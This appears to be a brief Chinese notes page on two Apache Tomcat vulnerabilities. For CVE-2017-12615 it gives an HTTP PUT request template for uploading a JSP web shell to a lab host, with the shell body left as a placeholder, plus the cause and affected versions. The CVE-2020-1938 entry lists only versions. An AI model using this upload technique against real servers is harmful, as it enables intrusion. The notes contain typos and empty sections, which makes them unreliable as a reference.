赞
踩
1.tomcat的put方法任意文件伤处(CVE-2017-12615)
操作技巧:
PUT /1.jsp/ HTTP/1.1
Host: 192.168.68.129:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: pma_lang=zh_CN; pma_collation_connection=utf8_unicode_ci; pma_iv-1=7NAD17di6vClaJyc0N8cgg%3D%3D; pmaUser-1=4rpFApOE5FqGsLbAntfpdQ%3D%3D
Connection: close
Content-Length: 1
shell代码
漏洞原理:开启了put方法,且readonly初始化参数由默认值设置为false
漏洞版本:7.0.0-7.0.79
2.tomcat的apj文件包含漏洞(CVE-2020-1938)
操作技巧:
漏洞原理:
漏洞版本:
Apache Tomcat 9.x < 9.0.31
Apache Tomcat 8.x < 8.5.51
Apache Tomcat 7.x < 7.0.100
Apache Tomcat 6.x
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。